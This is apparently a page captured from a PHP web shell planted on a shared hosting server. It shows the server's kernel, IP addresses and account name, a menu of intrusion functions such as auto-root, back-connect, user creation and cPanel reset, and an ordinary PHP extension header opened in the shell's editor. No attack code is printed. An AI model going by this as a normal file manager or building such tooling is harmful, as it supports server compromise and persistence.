Linux premium155.web-hosting.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64
LiteSpeed
: 162.0.235.200 | : 3.149.25.117
Cant Read [ /etc/named.conf ]
7.4.33
varifktc
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
opt /
alt /
php70 /
usr /
include /
php /
ext /
psr /
[ HOME SHELL ]
Name
Size
Permission
Action
php_psr.h
1.76
KB
-rw-r--r--
psr_cache.h
2.26
KB
-rw-r--r--
psr_container.h
793
B
-rw-r--r--
psr_event_dispatcher.h
1.12
KB
-rw-r--r--
psr_http_client.h
1.18
KB
-rw-r--r--
psr_http_factory.h
2.89
KB
-rw-r--r--
psr_http_message.h
8.57
KB
-rw-r--r--
psr_http_server_handler.h
688
B
-rw-r--r--
psr_http_server_middleware.h
777
B
-rw-r--r--
psr_link.h
2.05
KB
-rw-r--r--
psr_log.h
2.31
KB
-rw-r--r--
psr_simple_cache.h
1.57
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : php_psr.h
#ifndef PHP_PSR_H #define PHP_PSR_H #include "php.h" #include "php_ini.h" #include "ext/standard/info.h" #ifdef ZTS #include "TSRM.h" #endif #if defined(PHP_WIN32) && defined(PSR_EXPORTS) #define PHP_PSR_API __declspec(dllexport) #else #define PHP_PSR_API PHPAPI #endif #define PHP_PSR_NAME "psr" #define PHP_PSR_VERSION "1.0.0" #define PHP_PSR_RELEASE "2020-02-18" #define PHP_PSR_AUTHORS "John Boehr <jbboehr@gmail.com> (lead)" #define PHP_PSR_ABSTRACT_ME(c, f) PHP_ABSTRACT_ME(c, f, arginfo_ ## c ## _ ## f) #define PHP_PSR_BEGIN_ARG_INFO(c, f, n) ZEND_BEGIN_ARG_INFO_EX(arginfo_ ## c ## _ ## f, ZEND_SEND_BY_VAL, ZEND_RETURN_VALUE, n) #define PHP_PSR_END_ARG_INFO ZEND_END_ARG_INFO #define REGISTER_PSR_CLASS_CONST_STRING(ce, const_name, value) \ zend_declare_class_constant_stringl(ce, const_name, sizeof(const_name)-1, value, sizeof(value)-1); #ifdef ZEND_BEGIN_ARG_WITH_RETURN_OBJ_INFO_EX #define PHP_PSR_BEGIN_ARG_WITH_RETURN_OBJ_INFO(c, f, n, cn, an) ZEND_BEGIN_ARG_WITH_RETURN_OBJ_INFO_EX(arginfo_ ## c ## _ ## f, ZEND_RETURN_VALUE, n, cn, an) #define PHP_PSR_BEGIN_ARG_WITH_RETURN_TYPE_INFO(c, f, n, t, an) ZEND_BEGIN_ARG_WITH_RETURN_TYPE_INFO_EX(arginfo_ ## c ## _ ## f, ZEND_RETURN_VALUE, n, t, an) #else #define PHP_PSR_BEGIN_ARG_WITH_RETURN_OBJ_INFO(c, f, n, cn, an) ZEND_BEGIN_ARG_WITH_RETURN_TYPE_INFO_EX(arginfo_ ## c ## _ ## f, ZEND_RETURN_VALUE, n, IS_OBJECT, #cn, an) #define PHP_PSR_BEGIN_ARG_WITH_RETURN_TYPE_INFO(c, f, n, t, an) ZEND_BEGIN_ARG_WITH_RETURN_TYPE_INFO_EX(arginfo_ ## c ## _ ## f, ZEND_RETURN_VALUE, n, t, NULL, an) #endif extern zend_module_entry psr_module_entry; #define phpext_psr_ptr &psr_module_entry #endif /* PHP_PSR_H */ /* * Local variables: * tab-width: 4 * c-basic-offset: 4 * End: * vim600: fdm=marker * vim: et sw=4 ts=4 */
Close